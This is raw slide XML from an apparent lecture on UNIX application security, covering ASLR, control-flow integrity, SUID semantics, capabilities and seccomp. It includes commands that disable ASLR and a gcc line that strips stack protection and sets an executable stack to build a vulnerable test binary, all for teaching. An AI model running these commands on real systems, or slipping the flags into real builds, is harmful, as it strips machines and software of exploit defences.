            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="412439396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ASLR in Linux</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ASLR is enabled in Linux by default</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/sys/kernel/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>randomize_va_space</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It is implemented by the kernel in collaboration with the ELF loader</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stack ASLR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Libs/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ASLR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exec ASLR (Requires executables in PIE format)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>More resilient to ROP attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Brk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ASLR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>VDSO ASLR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70275348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Exploitation under ASLR</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ASLR can be disabled by:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Setting the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>asociated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> kernel variable to 0</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>echo “0” &gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/sys/kernel/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>randomize_va_space</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>setarch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>setarch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -m` -R /bin/bash </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ASLR can be defeated by brute-forcing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If it is possible to limit the variation space</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacks can be structured in two steps:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Address leaking (e.g., through a format string attack)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Control-flow hijacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="272664993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Step 4: Control Flow Integrity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Control-Flow Integrity: Principles, Implementation and Applications by M. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Abadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> et al., CCS 2005</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="44621891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Integrity</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Programs have a control-flow graph (CFG)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Basic blocks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Direct or indirect control transfers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Memory corruption attacks often result in execution paths that do not exist in the CFG </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Control Flow Integrity (CFI) enforces that execution follows the CFG</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An application is analyzed at compile time and its CFG is derived</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The application is then instrumented in order to check that, at run-time, the control transfer follow the established CFG</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="104370591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Applications can be exploited by </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Providing unexpected inputs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Generating unexpected environmental conditions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sanitizing user inputs and understanding environmental dependencies is key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The use of safe coding, safe languages, and existing protection mechanisms can greatly reduce the risk of exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Application-logic attacks are still possible </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="86491758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r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>test.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> -w -O0 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>ggdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>std</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>=c99 –static </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-m32 </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-omit-frame-pointer</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-PIC</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>mpreferred</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-stack-boundary=2</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-D_FORTIFY_SOURCE=0 </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-pie -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Wno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-format -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Wno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-format-security</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-stack-protector -z </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>norelro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> -z </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>execstack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-o test</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="329765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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>SUID Behavior</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1028099" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>setuid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uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> sets the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ruid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>euid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>suid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It is allowed only if</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>euid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>euid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is not 0, but </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>euid</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>seteuid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uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> sets the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>euid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>euid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is not 0, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> must be either the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ruid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> or the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>suid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>setresuid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ruid,uid_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>euid,uid_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>suid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allows one to set the three IDs </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unprivileged processes can only switch among existing values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By using the saved UID, a SUID process can securely switch between the the ID of the user invoking the program and the ID of the user owning the executable</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3665650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1ED9-CFED-EFDE-7203-4ACDCE876F9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="205979"/>
            <a:ext cx="8229600" cy="857250"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Capabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C1F24A8-84D3-0BAB-6465-9D9250F5005F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1200150"/>
            <a:ext cx="8229600" cy="3753890"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Capabilities are specific abilities that can be assigned to a process/thread</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Examples:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CAP_CHOWN: allows arbitrary changes to files’ UIDs/GIDs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CAP_SETUID: allows changing the UID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CAP_NET_ADMIN: allows various network-related operations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Capabilities can be associated with executable files using the extended attribute: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>security.capability</a:t>
            </a:r>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42775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037-585C-7D80-751C-90D5D5621D0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Seccomp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F94F0A72-1341-A0BE-4034-BEB2CD6DD229}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Seccomp is an additional layer of protection for applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It allows a process to transition to a “secure” state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Execute exit() and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sigreturn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Execute read() and write() only from already-opened file descriptors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Seccomp.bpf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> allows for a more flexible filtering of system calls using the extended Berkely Packer Filter (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eBPF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Seccomp can be used to implement sandboxing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="306487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Attacking UNIX Applications</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
